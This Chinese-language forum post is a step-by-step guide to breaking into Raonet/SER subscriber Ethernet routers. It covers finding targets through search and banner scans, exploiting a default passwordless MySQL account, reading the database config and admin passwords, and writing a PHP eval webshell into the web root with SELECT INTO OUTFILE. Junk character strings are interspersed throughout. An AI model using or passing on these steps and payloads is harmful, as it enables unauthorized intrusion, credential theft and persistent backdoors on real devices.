寻找存在漏洞的路由器方法:
p$ _( b- |+ m3 _& N) X* t3 h4 J( i5 p. Z6 A
1:google搜索'Raonet Subscriber Ethernet Router'% v s: a+ p# q0 D3 S/ ~' t% t
3 C. K. e6 k) n' p+ p
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
0 C; l% a& [* _
: B, Q( X- |) o' y" D/ t3 ~4 d3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
s* w0 }& H6 d1 Y' W0 `$ w; ^" H' O& T
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......; A1 i6 E4 n- _, D5 o2 n" k X
* }+ f5 \4 ?( l! \) s+ L
* S+ S$ E4 D0 U9 V
; o8 n/ H, n$ d
入侵步骤:
( t$ p' O, A5 h8 Q) `! M4 ]$ c: R8 ^
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php% K: J0 T* B# l$ f$ W% C/ I
+ L7 m# K3 t( z5 x
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc; p% h) W! E5 t2 m
3:得到密码后连接,查看GUI管理密码:( j% M2 S, T1 J6 y6 C3 C8 J0 X3 b
use ser_500
- R; j9 [8 @ q! b( \select id,passwd from user;
! I# F, T0 }5 |+ ?" |+ s; Y! ^4:通过数据库写入webshell,执行命令:% K! @ |( r/ b+ b/ e {+ A- W
use mysql;
, P* w* ~4 d3 S+ Mcreate table ok(cmd TEXT);
/ `8 r2 W& d y. G* |' T) Binsert into ok values("<?php @eval($_POST[cmd])?>");
/ P) j) b7 @) Hselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
* P$ w( C' N! l( Qdrop table ok;# \2 b" E: J* M8 ~# p2 H
* }. Z0 g F- s5 z5:连接后门shell.php 2 E/ r$ l/ n% Y* m
6 ~6 k, N6 h8 E X+ b) u* @, L6. 搞定!
; Z9 _7 }& t- ]
" l$ _6 R5 h* K* w- W9 A |